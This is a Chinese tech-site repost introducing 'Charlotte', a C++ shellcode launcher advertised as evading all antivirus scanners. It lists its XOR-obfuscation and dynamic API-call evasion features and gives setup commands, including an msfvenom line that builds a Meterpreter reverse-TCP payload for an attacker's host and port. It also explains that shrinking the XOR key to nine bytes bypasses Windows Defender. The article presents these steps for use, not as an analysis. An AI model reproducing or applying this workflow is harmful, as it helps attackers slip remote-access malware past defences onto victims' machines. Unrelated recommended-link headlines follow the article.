Charlotte：完全不会被检测到的Shellcode启动器

Alpha_h4ck 2021-05-25 07:46:25 37094 1

1621899686_60ac39a60194cfcd849d0.jpg!small

关于Charlotte

Charlotte是一款基于C++实现的Shellcode启动器，并且完全不会被安全解决方案所检测到。

截止至2021年5月13日之前，该工具的检测结果为0/26；

该工具支持动态调用Win32 API函数；

对Shellcode和函数名进行异或加密；

每次运行随机化异或密钥和变量；

在Kali Linux上，只需运行“apt-get install mingw-w64*”即可；

支持随机字符串长度和异或密钥长度；

antiscan.me

1621899703_60ac39b7dbe59b40a02d8.png!small

首先，我们需要使用git clone命令将该项目源码克隆至本地，并使用脚本工具生成Shellcode文件。具体操作示例如下：

git clone https://github.com/9emin1/charlotte.git && apt-get install mingw-w64*

cd charlotte

msfvenom -p windows/x64/meterpreter_reverse_tcp LHOST=$YOUR_IP LPORT=$YOUR_PORT -f raw > beacon.bin

python charlotte.py

使用msfvenom -p测试以及Cobalt Strike原始格式Payload

很明显，Windows Defender是能够检测到.DLL代码的，但我们在POC中通过将16字节大小的异或密钥降低至9个字节，就可以规避检测了。

Charlotte：【GitHub传送门】

本文作者：Alpha_h4ck，转载请注明来自FreeBuf.COM

# shellcode # shellcode工具

关于Charlotte

antiscan.me

使用msfvenom -p测试以及Cobalt Strike原始格式Payload

Recommend

Github GitHub - kzl/decision-transformer: Official codebase for Decision Transfo...

App安全合规的思考（四）权限问题

‎App Store 上的“LAYOUT 拍立得相机 - 极简时尚自拍，复古海报美图设计”

未曾后悔的选择——奥迪2020款Q5L 45 TFSI尊享时尚型

神探tcpdump第一招

Ubuntu-20.04.1-通过wine安装Wechat(附报错解决)

接送高考生车辆不受尾号限行北京发布高考期间交通管理政策

曼城后卫迪亚斯当选2020-2021赛季英超最佳球员

聊一聊名爵ZS的配置

网络基础：路由表、默认网关和掩码等

About Joyk